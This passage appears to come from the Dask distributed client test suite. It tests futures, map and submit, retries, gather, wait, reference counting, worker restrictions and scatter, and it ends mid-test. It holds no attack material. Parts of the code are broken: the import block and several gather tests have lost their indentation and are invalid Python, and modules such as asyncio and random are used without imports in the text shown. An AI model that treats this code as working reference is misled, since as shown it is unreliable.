from time import sleep
import psutil
import pytest
from tlz import concat, first, identity, isdistinct, merge, pluck, valmap
import dask
import dask.bag as db
from dask import delayed
from dask.optimization import SubgraphCallable
from dask.utils import stringify, tmpfile
from distributed import (
CancelledError,
Executor,
LocalCluster,
Nanny,
TimeoutError,
Worker,
fire_and_forget,
get_client,
get_worker,
performance_report,
profile,
secede,
)
from distributed.client import (
Client,
Future,
_get_global_client,
as_completed,
default_client,
futures_of,
get_task_metadata,
temp_default_client,
tokenize,
wait,
)
from distributed.comm import CommClosedError
from distributed.compatibility import LINUX, WINDOWS
from distributed.core import Status
from distributed.metrics import time
from distributed.objects import HasWhat, WhoHas
from distributed.scheduler import (
COMPILED,
CollectTaskMetaDataPlugin,
KilledWorker,
Scheduler,
)
from distributed.sizeof import sizeof
from distributed.utils import is_valid_xml, mp_context, sync, tmp_text
from distributed.utils_test import (
TaskStateMetadataPlugin,
_UnhashableCallable,
async_wait_for,
asyncinc,
captured_logger,
cluster,
dec,
div,
double,
gen_cluster,
gen_test,
geninc,
inc,
map_varying,
nodebug,
popen,
pristine_loop,
randominc,
save_sys_modules,
slowadd,
slowdec,
slowinc,
throws,
varying,
wait_for,
)
# Mark every test in this module for the "ci1" CI partition.
pytestmark = pytest.mark.ci1


@gen_cluster(client=True)
async def test_submit(c, s, a, b):
    """submit() returns a Future tied to this client; results and chaining work."""
    x = c.submit(inc, 10, key="x")
    assert not x.done()

    assert isinstance(x, Future)
    assert x.client is c

    result = await x
    assert result == 11
    assert x.done()

    y = c.submit(inc, 20, key="y")
    z = c.submit(add, x, y)

    result = await z
    assert result == 11 + 21
    s.validate_state()


@gen_cluster(client=True)
async def test_map(c, s, a, b):
    """map() over iterables, over futures, with uneven lengths and kwargs."""
    L1 = c.map(inc, range(5))
    assert len(L1) == 5
    assert isdistinct(x.key for x in L1)
    assert all(isinstance(x, Future) for x in L1)

    result = await L1[0]
    assert result == inc(0)
    assert len(s.tasks) == 5

    L2 = c.map(inc, L1)

    result = await L2[1]
    assert result == inc(inc(1))
    assert len(s.tasks) == 10
    # assert L1[0].key in s.tasks[L2[0].key]

    total = c.submit(sum, L2)
    result = await total
    assert result == sum(map(inc, map(inc, range(5))))

    L3 = c.map(add, L1, L2)
    result = await L3[1]
    assert result == inc(1) + inc(inc(1))

    # zip semantics: the shorter argument bounds the output length
    L4 = c.map(add, range(3), range(4))
    results = await c.gather(L4)
    assert results == list(map(add, range(3), range(4)))

    def f(x, y=10):
        return x + y

    L5 = c.map(f, range(5), y=5)
    results = await c.gather(L5)
    assert results == list(range(5, 10))

    # a Future passed as a keyword argument is resolved before calling f
    y = c.submit(f, 10)
    L6 = c.map(f, range(5), y=y)
    results = await c.gather(L6)
    assert results == list(range(20, 25))
    s.validate_state()


@gen_cluster(client=True)
async def test_map_empty(c, s, a, b):
    """map() over an empty iterable yields no futures and gathers to []."""
    L1 = c.map(inc, [], pure=False)
    assert len(L1) == 0
    results = await c.gather(L1)
    assert results == []


@gen_cluster(client=True)
async def test_map_keynames(c, s, a, b):
    """Custom key prefixes and explicit key lists are honoured by map()."""
    futures = c.map(inc, range(4), key="INC")
    assert all(f.key.startswith("INC") for f in futures)
    assert isdistinct(f.key for f in futures)

    futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
    assert [f.key for f in futures] != [f.key for f in futures2]

    keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
    futures = c.map(inc, range(4), key=keys)
    assert [f.key for f in futures] == keys
@gen_cluster(client=True)
async def test_map_retries(c, s, a, b):
    """retries=N re-runs a failing task up to N extra times per future."""
    args = [
        [ZeroDivisionError("one"), 2, 3],
        [4, 5, 6],
        [ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
    ]

    # two retries are enough to get past every injected failure
    x, y, z = c.map(*map_varying(args), retries=2)
    assert await x == 2
    assert await y == 4
    assert await z == 9

    # one retry: z still fails on its second error ("eight")
    x, y, z = c.map(*map_varying(args), retries=1, pure=False)
    assert await x == 2
    assert await y == 4
    with pytest.raises(ZeroDivisionError, match="eight"):
        await z

    # no retries: the first injected error surfaces immediately
    x, y, z = c.map(*map_varying(args), retries=0, pure=False)
    with pytest.raises(ZeroDivisionError, match="one"):
        await x
    assert await y == 4
    with pytest.raises(ZeroDivisionError, match="seven"):
        await z


@gen_cluster(client=True)
async def test_map_batch_size(c, s, a, b):
    """batch_size only affects submission batching, not the results."""
    result = c.map(inc, range(100), batch_size=10)
    result = await c.gather(result)
    assert result == list(range(1, 101))

    result = c.map(add, range(100), range(100), batch_size=10)
    result = await c.gather(result)
    assert result == list(range(0, 200, 2))

    # mismatch shape
    result = c.map(add, range(100, 200), range(10), batch_size=2)
    result = await c.gather(result)
    assert result == list(range(100, 120, 2))


@gen_cluster(client=True)
async def test_custom_key_with_batches(c, s, a, b):
    """Test of <https://github.com/dask/distributed/issues/4588>"""
    futs = c.map(
        lambda x: x ** 2,
        range(10),
        batch_size=5,
        key=[str(x) for x in range(10)],
    )
    assert len(futs) == 10
    await wait(futs)


@gen_cluster(client=True)
async def test_compute_retries(c, s, a, b):
    """compute(..., retries=N) retries failing delayed computations."""
    args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]

    # Sanity check for varying() use
    x = c.compute(delayed(varying(args))())
    with pytest.raises(ZeroDivisionError, match="one"):
        await x

    # Same retries for all
    x = c.compute(delayed(varying(args))(), retries=1)
    with pytest.raises(ZeroDivisionError, match="two"):
        await x

    x = c.compute(delayed(varying(args))(), retries=2)
    assert await x == 3

    args.append(4)
    x = c.compute(delayed(varying(args))(), retries=2)
    assert await x == 3
@gen_cluster(client=True)
async def test_compute_retries_annotations(c, s, a, b):
    """dask.annotate(retries=...) scopes retries to individual futures."""
    # Per-future retries
    xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
    yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
    zargs = [80, 90, 100]

    with dask.annotate(retries=2):
        x = delayed(varying(xargs))()
        y = delayed(varying(yargs))()

    x, y = c.compute([x, y], optimize_graph=False)
    gc.collect()

    assert await x == 30
    with pytest.raises(ZeroDivisionError, match="five"):
        await y

    # only y and z are annotated; x keeps the default of no retries
    x = delayed(varying(xargs))()
    with dask.annotate(retries=2):
        y = delayed(varying(yargs))()
        z = delayed(varying(zargs))()

    x, y, z = c.compute([x, y, z], optimize_graph=False)

    with pytest.raises(ZeroDivisionError, match="one"):
        await x
    assert await y == 70
    assert await z == 80


def test_retries_get(c):
    """retries= also works through the synchronous compute() path."""
    args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
    x = delayed(varying(args))()
    assert x.compute(retries=5) == 3

    args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
    x = delayed(varying(args))()
    with pytest.raises(ZeroDivisionError):
        x.compute()


@gen_cluster(client=True)
async def test_compute_persisted_retries(c, s, a, b):
    """retries passed to compute() apply to already-persisted collections."""
    args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]

    # Sanity check
    x = c.persist(delayed(varying(args))())
    fut = c.compute(x)
    with pytest.raises(ZeroDivisionError, match="one"):
        await fut

    x = c.persist(delayed(varying(args))())
    fut = c.compute(x, retries=1)
    with pytest.raises(ZeroDivisionError, match="two"):
        await fut

    x = c.persist(delayed(varying(args))())
    fut = c.compute(x, retries=2)
    assert await fut == 3

    args.append(4)
    x = c.persist(delayed(varying(args))())
    fut = c.compute(x, retries=3)
    assert await fut == 3


@gen_cluster(client=True)
async def test_persist_retries(c, s, a, b):
    """retries passed to persist() carry over into the computed result."""
    # Same retries for all
    args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]

    x = c.persist(delayed(varying(args))(), retries=1)
    x = c.compute(x)
    with pytest.raises(ZeroDivisionError, match="two"):
        await x

    x = c.persist(delayed(varying(args))(), retries=2)
    x = c.compute(x)
    assert await x == 3


@gen_cluster(client=True)
async def test_persist_retries_annotations(c, s, a, b):
    """dask.annotate(retries=...) scopes retries per key through persist()."""
    # Per-key retries
    xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
    yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
    zargs = [80, 90, 100]

    x = delayed(varying(xargs))()
    with dask.annotate(retries=2):
        y = delayed(varying(yargs))()
        z = delayed(varying(zargs))()

    x, y, z = c.persist([x, y, z], optimize_graph=False)
    x, y, z = c.compute([x, y, z])

    with pytest.raises(ZeroDivisionError, match="one"):
        await x
    assert await y == 70
    assert await z == 80


@gen_cluster(client=True)
async def test_retries_dask_array(c, s, a, b):
    """retries= is accepted for dask.array computations as well."""
    da = pytest.importorskip("dask.array")
    x = da.ones((10, 10), chunks=(3, 3))
    future = c.compute(x.sum(), retries=2)
    y = await future
    assert y == 100
@gen_cluster(client=True)
async def test_future_repr(c, s, a, b):
    """Future repr/HTML repr include key, status, and result type info."""
    pd = pytest.importorskip("pandas")
    x = c.submit(inc, 10)
    y = c.submit(pd.DataFrame, {"x": [1, 2, 3]})
    await x
    await y

    for func in [repr, lambda x: x._repr_html_()]:
        assert str(x.key) in func(x)
        assert str(x.status) in func(x)
        assert str(x.status) in repr(c.futures[x.key])
        assert "int" in func(x)
        assert "pandas" in func(y)
        assert "DataFrame" in func(y)


@gen_cluster(client=True)
async def test_future_tuple_repr(c, s, a, b):
    """Every element of a tuple key appears in the Future's repr."""
    da = pytest.importorskip("dask.array")
    y = da.arange(10, chunks=(5,)).persist()
    f = futures_of(y)[0]
    for func in [repr, lambda x: x._repr_html_()]:
        for k in f.key:
            assert str(k) in func(f)


@gen_cluster(client=True)
async def test_Future_exception(c, s, a, b):
    """Future.exception() returns the raised error, or None on success."""
    x = c.submit(div, 1, 0)
    result = await x.exception()
    assert isinstance(result, ZeroDivisionError)

    x = c.submit(div, 1, 1)
    result = await x.exception()
    assert result is None


def test_Future_exception_sync(c):
    """Synchronous variant of Future.exception()."""
    x = c.submit(div, 1, 0)
    assert isinstance(x.exception(), ZeroDivisionError)

    x = c.submit(div, 1, 1)
    assert x.exception() is None


@gen_cluster(client=True)
async def test_Future_release(c, s, a, b):
    # Released Futures should be removed timely from the Client
    x = c.submit(div, 1, 1)
    await x
    x.release()
    await asyncio.sleep(0)
    assert not c.futures

    x = c.submit(slowinc, 1, delay=0.5)
    x.release()
    await asyncio.sleep(0)
    assert not c.futures

    x = c.submit(div, 1, 0)
    await x.exception()
    x.release()
    await asyncio.sleep(0)
    assert not c.futures


def test_Future_release_sync(c):
    # Released Futures should be removed timely from the Client
    x = c.submit(div, 1, 1)
    x.result()
    x.release()
    wait_for(lambda: not c.futures, timeout=0.3)

    x = c.submit(slowinc, 1, delay=0.8)
    x.release()
    wait_for(lambda: not c.futures, timeout=0.3)

    x = c.submit(div, 1, 0)
    x.exception()
    x.release()
    wait_for(lambda: not c.futures, timeout=0.3)


def test_short_tracebacks(loop, c):
    """Remote exceptions carry short tracebacks (few frames of overhead)."""
    tblib = pytest.importorskip("tblib")
    future = c.submit(div, 1, 0)
    try:
        future.result()
    except Exception:
        _, _, tb = sys.exc_info()
    tb = tblib.Traceback(tb).to_dict()

    n = 0
    while tb is not None:
        n += 1
        tb = tb["tb_next"]

    assert n < 5
@gen_cluster(client=True)
async def test_map_naming(c, s, a, b):
    """Pure map() calls with equal inputs deduplicate to the same keys."""
    L1 = c.map(inc, range(5))
    L2 = c.map(inc, range(5))

    assert [x.key for x in L1] == [x.key for x in L2]

    L3 = c.map(inc, [1, 1, 1, 1])
    assert len({x._state for x in L3}) == 1

    L4 = c.map(inc, [1, 1, 1, 1], pure=False)
    assert len({x._state for x in L4}) == 4


@gen_cluster(client=True)
async def test_submit_naming(c, s, a, b):
    """Pure submit() calls share state; pure=False forces distinct keys."""
    a = c.submit(inc, 1)
    b = c.submit(inc, 1)
    assert a._state is b._state

    c = c.submit(inc, 1, pure=False)
    assert c.key != a.key


@gen_cluster(client=True)
async def test_exceptions(c, s, a, b):
    """A failed task raises on await; the client keeps operating."""
    x = c.submit(div, 1, 2)
    result = await x
    assert result == 1 / 2

    x = c.submit(div, 1, 0)
    with pytest.raises(ZeroDivisionError):
        await x

    x = c.submit(div, 10, 2)  # continues to operate
    result = await x
    assert result == 10 / 2


@gen_cluster()
async def test_gc(s, a, b):
    """Deleting the last Future reference releases the key on the scheduler."""
    c = await Client(s.address, asynchronous=True)

    x = c.submit(inc, 10)
    await x
    assert s.tasks[x.key].who_has
    x.__del__()
    await async_wait_for(
        lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
    )

    await c.close()


def test_thread(c):
    """Synchronous result() works from a plain thread, honouring timeouts."""
    x = c.submit(inc, 1)
    assert x.result() == 2

    x = c.submit(slowinc, 1, delay=0.3)
    with pytest.raises(TimeoutError):
        x.result(timeout="10 ms")
    assert x.result() == 2


def test_sync_exceptions(c):
    """Synchronous result() re-raises remote exceptions."""
    x = c.submit(div, 10, 2)
    assert x.result() == 5

    y = c.submit(div, 10, 0)
    try:
        y.result()
        assert False
    except ZeroDivisionError:
        pass

    z = c.submit(div, 10, 5)
    assert z.result() == 2
@gen_cluster(client=True)
async def test_gather(c, s, a, b):
x = c.submit(inc, 10)
y = c.submit(inc, x)
result = await c.gather(x)
assert result == 11
result = await c.gather([x])
assert result == [11]
result = await c.gather({"x": x, "y": [y]})
assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
async def test_gather_mismatched_client(c, s, a, b):
c2 = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
y = c2.submit(inc, 5)
with pytest.raises(ValueError, match="Futures created by another client"):
await c.gather([x, y])
@gen_cluster(client=True)
async def test_gather_lost(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
await a.close()
with pytest.raises(Exception):
await c.gather([x, y])
def test_gather_sync(c):
x = c.submit(inc, 1)
assert c.gather(x) == 2
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
c.gather([x, y])
[xx] = c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True)
async def test_gather_strict(c, s, a, b):
x = c.submit(div, 2, 1)
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await c.gather([x, y])
[xx] = await c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_gather_skip(c, s, a):
    """gather(errors='skip') is quiet: no scheduler or client log noise."""
    # high priority so the failing task runs first on the single thread
    x = c.submit(div, 1, 0, priority=10)
    y = c.submit(slowinc, 1, delay=0.5)
    with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
        with captured_logger(logging.getLogger("distributed.client")) as client:
            L = await c.gather([x, y], errors="skip")
            assert L == [2]
    assert not client.getvalue()
    assert not sched.getvalue()
@gen_cluster(client=True)
async def test_limit_concurrent_gathering(c, s, a, b):
    """Gathering many futures batches worker transfers rather than issuing
    one transfer per key."""
    futures = c.map(inc, range(100))
    await c.gather(futures)
    assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True)
async def test_get(c, s, a, b):
    """Client.get(sync=False) returns futures for scalar, list, and empty keys."""
    future = c.get({"x": (inc, 1)}, "x", sync=False)
    assert isinstance(future, Future)
    result = await future
    assert result == 2
    # a list of keys yields a list of futures
    futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
    assert isinstance(futures[0], Future)
    result = await c.gather(futures)
    assert result == [2]
    # empty graph / empty key list is valid
    futures = c.get({}, [], sync=False)
    result = await c.gather(futures)
    assert result == []
    # tuple keys work as well
    result = await c.get(
        {("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
    )
    assert result == 3
def test_get_sync(c):
    """Synchronous Client.get evaluates a trivial one-task graph."""
    result = c.get({"x": (inc, 1)}, "x")
    assert result == 2
def test_no_future_references(c):
    """The client holds no hidden strong references to user futures; once the
    user drops them, they become garbage-collectable."""
    from weakref import WeakSet
    ws = WeakSet()
    futures = c.map(inc, range(10))
    ws.update(futures)
    del futures
    import gc
    gc.collect()
    start = time()
    # wait for the weak references to clear; fail after 30s
    while list(ws):
        sleep(0.01)
        assert time() < start + 30
def test_get_sync_optimize_graph_passes_through(c):
    """dask.compute(optimize_graph=False) works through the client scheduler."""
    bag = db.range(10, npartitions=3).map(inc)
    dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
async def test_gather_errors(c, s, a, b):
    """Gather re-raises the original exception type of a failed task."""
    def f(a, b):
        raise TypeError
    def g(a, b):
        raise AttributeError
    future_f = c.submit(f, 1, 2)
    future_g = c.submit(g, 1, 2)
    with pytest.raises(TypeError):
        await c.gather(future_f)
    with pytest.raises(AttributeError):
        await c.gather(future_g)
    await a.close()
@gen_cluster(client=True)
async def test_wait(c, s, a, b):
    """wait() blocks until all futures finish by default."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 1)
    z = c.submit(inc, 2)
    done, not_done = await wait([x, y, z])
    assert done == {x, y, z}
    assert not_done == set()
    assert x.status == y.status == "finished"
@gen_cluster(client=True)
async def test_wait_first_completed(c, s, a, b):
    """wait(return_when='FIRST_COMPLETED') returns as soon as one future ends."""
    x = c.submit(slowinc, 1)
    y = c.submit(slowinc, 1)
    z = c.submit(inc, 2)  # the fast one should complete first
    done, not_done = await wait([x, y, z], return_when="FIRST_COMPLETED")
    assert done == {z}
    assert not_done == {x, y}
    assert z.status == "finished"
    assert x.status == "pending"
    assert y.status == "pending"
@gen_cluster(client=True)
async def test_wait_timeout(c, s, a, b):
    """wait() raises TimeoutError when the timeout elapses first."""
    future = c.submit(sleep, 0.3)
    with pytest.raises(TimeoutError):
        await wait(future, timeout=0.01)
def test_wait_sync(c):
    """Synchronous wait() mirrors the async behavior, including timeouts."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    done, not_done = wait([x, y])
    assert done == {x, y}
    assert not_done == set()
    assert x.status == y.status == "finished"
    future = c.submit(sleep, 0.3)
    with pytest.raises(TimeoutError):
        wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
    """wait(x, y) passes y as the timeout argument by mistake; the resulting
    error message should steer the user toward passing a list of futures."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    try:
        wait(x, y)
    except Exception as e:
        assert "timeout" in str(e)
        assert "list" in str(e)
    else:
        # BUG FIX: without this branch the test passed vacuously whenever
        # wait(x, y) raised nothing at all.
        assert False, "wait(x, y) should have raised an informative error"
@gen_cluster(client=True)
async def test_garbage_collection(c, s, a, b):
    """Reference counts drop as futures are deleted; keys with remaining
    dependents stay alive until the last reference is gone."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 1)
    # x and y are pure and identical, so they share a key -> refcount 2
    assert c.refcount[x.key] == 2
    x.__del__()
    await asyncio.sleep(0)
    assert c.refcount[x.key] == 1
    z = c.submit(inc, y)  # z depends on y
    y.__del__()
    await asyncio.sleep(0)
    result = await z
    assert result == 3
    ykey = y.key
    y.__del__()
    await asyncio.sleep(0)
    assert ykey not in c.futures
@gen_cluster(client=True)
async def test_garbage_collection_with_scatter(c, s, a, b):
    """Deleting the last reference to scattered data releases it cluster-wide."""
    [future] = await c.scatter([1])
    assert future.key in c.futures
    assert future.status == "finished"
    assert s.who_wants[future.key] == {c.id}
    key = future.key
    assert c.refcount[key] == 1
    future.__del__()
    await asyncio.sleep(0)
    assert c.refcount[key] == 0
    # wait for the scheduler to actually forget the data
    while key in s.tasks and s.tasks[key].who_has:
        await asyncio.sleep(0.1)
@gen_cluster(client=True)
async def test_recompute_released_key(c, s, a, b):
    """A released key can be resubmitted and recomputed with the same result."""
    x = c.submit(inc, 100)
    result1 = await x
    xkey = x.key
    del x
    import gc
    gc.collect()
    await asyncio.sleep(0)
    assert c.refcount[xkey] == 0
    # 1 second batching needs a second action to trigger
    while xkey in s.tasks and s.tasks[xkey].who_has or xkey in a.data or xkey in b.data:
        await asyncio.sleep(0.1)
    x = c.submit(inc, 100)  # same pure call -> same key
    assert x.key in c.futures
    result2 = await x
    assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
async def test_long_tasks_dont_trigger_timeout(c, s, a, b):
    """A multi-second task completes without tripping any internal timeout."""
    from time import sleep
    x = c.submit(sleep, 3)
    await x
@pytest.mark.skip
@gen_cluster(client=True)
async def test_missing_data_heals(c, s, a, b):
    """(Disabled) The scheduler recomputes data that silently vanished from
    workers when a dependent task needs it."""
    a.validate = False
    b.validate = False
    x = c.submit(inc, 1)
    y = c.submit(inc, x)
    z = c.submit(inc, y)
    await wait([x, y, z])
    # Secretly delete y's key
    if y.key in a.data:
        del a.data[y.key]
        a.release_key(y.key)
    if y.key in b.data:
        del b.data[y.key]
        b.release_key(y.key)
    await asyncio.sleep(0)
    w = c.submit(add, y, z)  # forces y to be healed
    result = await w
    assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_missing_data(c, s, a, b):
    """(Disabled) gather recomputes keys whose data was lost from all workers."""
    a.validate = False
    b.validate = False
    x, y, z = c.map(inc, range(3))
    await wait([x, y, z])  # everything computed
    # drop x and y from every worker that holds them
    for f in [x, y]:
        for w in [a, b]:
            if f.key in w.data:
                del w.data[f.key]
                await asyncio.sleep(0)
                w.release_key(f.key)
    xx, yy, zz = await c.gather([x, y, z])
    assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_nested_missing_data(c, s, a, b):
    """(Disabled) gather recomputes a whole lost chain of dependencies."""
    a.validate = False
    b.validate = False
    w = c.submit(inc, 1)
    x = c.submit(inc, w)
    y = c.submit(inc, x)
    z = c.submit(inc, y)
    await wait([z])
    # delete both the requested key and its parent from all workers
    for worker in [a, b]:
        for datum in [y, z]:
            if datum.key in worker.data:
                del worker.data[datum.key]
                await asyncio.sleep(0)
                worker.release_key(datum.key)
    result = await c.gather([z])
    assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
async def test_tokenize_on_futures(c, s, a, b):
    """tokenize() of a future is stable and key-based, not state-based."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 1)
    tok = tokenize(x)
    assert tokenize(x) == tokenize(x)
    # pure submissions of the same call share a key, hence a token
    assert tokenize(x) == tokenize(y)
    c.futures[x.key].finish()
    # finishing the underlying future does not change the token
    assert tok == tokenize(y)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_submit(c, s, a, b):
    """workers={ip} on submit records a host restriction and places the task."""
    x = c.submit(inc, 1, workers={a.ip})
    y = c.submit(inc, x, workers={b.ip})
    await wait([x, y])
    assert s.host_restrictions[x.key] == {a.ip}
    assert x.key in a.data
    assert s.host_restrictions[y.key] == {b.ip}
    assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port(c, s, a, b):
    """workers={address} (ip:port) records a worker restriction."""
    x = c.submit(inc, 1, workers={a.address})
    y = c.submit(inc, x, workers={b.address})
    await wait([x, y])
    assert s.worker_restrictions[x.key] == {a.address}
    assert x.key in a.data
    assert s.worker_restrictions[y.key] == {b.address}
    assert y.key in b.data
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_map(c, s, a, b):
    """workers= on map applies the host restriction to every mapped task."""
    L = c.map(inc, range(5), workers={a.ip})
    await wait(L)
    assert set(a.data) == {x.key for x in L}
    assert not b.data
    for x in L:
        assert s.host_restrictions[x.key] == {a.ip}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_get(c, s, a, b):
    """workers= on Client.get pins the whole graph to one host."""
    dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
    futures = c.get(dsk, ["y", "z"], workers=a.ip, sync=False)
    result = await c.gather(futures)
    assert result == [2, 3]
    assert "y" in a.data
    assert "z" in a.data
    assert len(b.data) == 0
@gen_cluster(client=True)
async def test_restrictions_get_annotate(c, s, a, b):
    """dask.annotate(workers=...) restrictions survive through Client.get."""
    x = 1
    with dask.annotate(workers=a.address):
        y = delayed(inc)(x)
    with dask.annotate(workers=b.address):
        z = delayed(inc)(y)
    futures = c.get(z.__dask_graph__(), [y.key, z.key], sync=False)
    result = await c.gather(futures)
    assert result == [2, 3]
    assert y.key in a.data
    assert z.key in b.data
@gen_cluster(client=True)
async def dont_test_bad_restrictions_raise_exception(c, s, a, b):
    """(Disabled by its dont_ prefix) A restriction naming a nonexistent
    worker should eventually raise an informative ValueError."""
    z = c.submit(inc, 2, workers={"bad-address"})
    try:
        await z
        assert False
    except ValueError as e:
        assert "bad-address" in str(e)
        assert z.key in str(e)
@gen_cluster(client=True)
async def test_remove_worker(c, s, a, b):
    """Results survive a worker shutdown; lost keys are recomputed on gather."""
    L = c.map(inc, range(20))
    await wait(L)
    await b.close()
    assert b.address not in s.workers
    result = await c.gather(L)
    assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_errors_dont_block(c, s, w):
    """Failing tasks do not prevent sibling tasks from completing."""
    L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
    while not (L[0].status == L[2].status == "finished"):
        await asyncio.sleep(0.01)
    result = await c.gather([L[0], L[2]])
    assert result == [2, 3]
@gen_cluster(client=True)
async def test_submit_quotes(c, s, a, b):
    """Lists in submit arguments are treated as data, not as task graphs."""
    def assert_list(x, z=[]):
        return isinstance(x, list) and isinstance(z, list)
    x = c.submit(assert_list, [1, 2, 3])
    result = await x
    assert result
    x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
    result = await x
    assert result
    # a list of futures is resolved to a list of their results
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    z = c.submit(assert_list, [x, y])
    result = await z
    assert result
@gen_cluster(client=True)
async def test_map_quotes(c, s, a, b):
    """Lists in map arguments and kwargs are passed through as plain data."""
    def assert_list(x, z=[]):
        return isinstance(x, list) and isinstance(z, list)
    L = c.map(assert_list, [[1, 2, 3], [4]])
    result = await c.gather(L)
    assert all(result)
    L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
    result = await c.gather(L)
    assert all(result)
    L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
    result = await c.gather(L)
    assert all(result)
@gen_cluster()
async def test_two_consecutive_clients_share_results(s, a, b):
    """With pure=True, a second client reuses results computed for the first."""
    c = await Client(s.address, asynchronous=True)
    x = c.submit(random.randint, 0, 1000, pure=True)
    xx = await x
    f = await Client(s.address, asynchronous=True)
    y = f.submit(random.randint, 0, 1000, pure=True)
    yy = await y
    # random result would differ if the task had actually re-run
    assert xx == yy
    await c.close()
    await f.close()
@gen_cluster(client=True)
async def test_submit_then_get_with_Future(c, s, a, b):
    """A Future may be embedded directly inside a graph passed to get."""
    x = c.submit(slowinc, 1)
    dsk = {"y": (inc, x)}
    result = await c.get(dsk, "y", sync=False)
    assert result == 3
@gen_cluster(client=True)
async def test_aliases(c, s, a, b):
    """A graph value that is itself a Future acts as an alias for its result."""
    x = c.submit(inc, 1)
    dsk = {"y": x}
    result = await c.get(dsk, "y", sync=False)
    assert result == 2
@gen_cluster(client=True)
async def test_aliases_2(c, s, a, b):
    """Key-to-key aliases resolve the same way as in local dask.get."""
    dsk_keys = [
        ({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
        ({"x": "y", "y": 1}, ["x"]),
        ({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
    ]
    for dsk, keys in dsk_keys:
        result = await c.gather(c.get(dsk, keys, sync=False))
        # distributed result must match the reference local scheduler
        assert list(result) == list(dask.get(dsk, keys))
        await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_scatter(c, s, a, b):
    """Scatter places data on workers, tracks nbytes, and returns futures
    usable as submit arguments."""
    d = await c.scatter({"y": 20})
    assert isinstance(d["y"], Future)
    assert a.data.get("y") == 20 or b.data.get("y") == 20
    y_who_has = s.get_who_has(keys=["y"])["y"]
    assert a.address in y_who_has or b.address in y_who_has
    assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
    yy = await c.gather([d["y"]])
    assert yy == [20]
    # scattering a list yields futures with generated keys
    [x] = await c.scatter([10])
    assert isinstance(x, Future)
    assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
    xx = await c.gather([x])
    x_who_has = s.get_who_has(keys=[x.key])[x.key]
    assert s.tasks[x.key].who_has
    assert (
        s.workers[a.address] in s.tasks[x.key].who_has
        or s.workers[b.address] in s.tasks[x.key].who_has
    )
    assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
    assert xx == [10]
    z = c.submit(add, x, d["y"])  # submit works on Future
    result = await z
    assert result == 10 + 20
    result = await c.gather([z, x])
    assert result == [30, 10]
@gen_cluster(client=True)
async def test_scatter_types(c, s, a, b):
    """Scatter preserves the container type of its input."""
    d = await c.scatter({"x": 1})
    assert isinstance(d, dict)
    assert list(d) == ["x"]
    for seq in [[1], (1,), {1}, frozenset([1])]:
        L = await c.scatter(seq)
        assert isinstance(L, type(seq))
        assert len(L) == 1
        s.validate_state()
    # arbitrary iterables (e.g. range) come back as lists
    seq = await c.scatter(range(5))
    assert isinstance(seq, list)
    assert len(seq) == 5
    s.validate_state()
@gen_cluster(client=True)
async def test_scatter_non_list(c, s, a, b):
    """Scattering a bare scalar yields a single Future."""
    x = await c.scatter(1)
    assert isinstance(x, Future)
    result = await x
